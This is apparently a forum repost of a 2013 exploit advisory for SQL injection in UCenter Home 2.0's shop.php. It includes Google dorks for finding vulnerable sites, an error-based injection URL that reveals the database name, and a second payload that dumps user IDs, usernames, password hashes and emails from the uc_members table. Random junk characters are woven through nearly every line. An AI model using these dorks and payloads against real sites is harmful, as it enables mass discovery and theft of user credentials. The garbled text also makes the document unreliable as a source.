' T$ n: f, W4 `! q- E
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
0 X. C# |# J' z% [8 M# X' ~
! b& b0 _; k5 h* ^4 P m4 m- z# g
9 d" r9 H2 N. e% L7 h, B! b# o+ o" K n. z
*/ Author : KnocKout & [! V; i) g2 f' y3 T) f
3 o( R0 v: y, v3 \, e0 g; `0 Q*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
1 Z3 P* @6 v9 `! A r4 Z0 _/ E0 d5 {8 I/ x4 Z: ?, m
*/ Contact: knockoutr@msn.com - ~8 R7 N$ r+ H0 T
! r3 q5 f5 y- v0 c*/ Cyber-Warrior.org/CWKnocKout & D+ b9 l+ h Q/ _4 \) d. b) f
# E! }1 x" r5 [& Z; H- t* E5 o3 M__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 9 N: }) G0 g( |3 r* a8 b
' | h" H! H/ p! `Script : UCenter Home ( H3 D- S+ R% h" w. K
! Z% n. W) s# C! L) xVersion : 2.0 9 f: d G8 N' ^* L' f, g
; y. Q% y# Q) }! |% A' X3 b
Script HomePage : http://u.discuz.net/ ( x3 R7 L& l+ E4 }9 B
. {- r( W- ?0 n5 ?+ m3 {__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 7 L b+ G& g4 E/ O6 Z- |9 C# l
. p" \& G% S4 }( W) SDork : Powered by UCenter inurl:shop.php?ac=view ) ~7 T3 P0 r9 d1 a1 B6 d1 `
o1 K) |; \( o, ]" @% Q J+ sDork 2 : inurl:shop.php?ac=view&shopid=
3 s- Y& ^" ?; w9 K# t1 g
) Q4 c8 u v* X1 W" L% Y__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
9 W2 ~ I8 K; @- a3 E; o) H) F L1 [1 G% U3 h1 p; F: d, }
Vuln file : Shop.php
/ b' j1 @# V$ i( N
: W% K. N' X0 I8 E5 p& v$ k& Wvalue's : (?)ac=view&shopid=
# D1 t$ b( N+ C& K( V( u+ ~
) Z% L" z5 T4 y. g+ R/ FVulnerable Style : SQL Injection (MySQL Error Based)
6 L8 c; B- Y& \& L/ ]1 ^: i
6 s1 {0 ]; c- w! R5 YNeed Metarials : Hex Conversion ' C4 a! S4 h* K
& Q- S( @& [6 w: t7 C" s: A$ f
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
6 a. G d' S# [+ W' z
. U. C4 N/ {, C* E7 ]5 IYour Need victim Database name.
' w4 l8 e- H, S& P. M( ^) {5 \. ]4 f5 b. Z* ^7 \4 [# I
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ( i2 W' X3 r& u" G
% T2 {* q9 k2 T! z+ W
..
5 s% g) H1 s, e; Q+ s
, C1 N0 x1 q# W, G4 zDB : Okey.
6 E6 b# u l8 }3 l8 D: [3 G: [1 D; q3 H/ L
your edit DB `[TARGET DB NAME]`
% O* ~. r: S# f4 }& E/ N( X
7 _; y. z7 j) [3 S- _Example : 'hiwir1_ucenter' 4 { S3 w$ L" N1 Z8 K
( Z W1 V0 \8 F4 N# DEdit : Okey. 4 \ V+ ]% s/ Y2 c6 t
, y: x$ U( w! _Your use Hex conversion. And edit Your SQL Injection Exploit.. + `5 t8 o9 b$ n* P+ O- O& V
; s* J! O R: d8 Y/ R ) n: |0 Y4 P( M9 i) w/ Y
8 l. P7 |5 c/ K8 l% e3 u5 @
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
! W6 ^ y! p3 S" j |
发表于 2013-2-27 21:31:31
收藏
支持
反对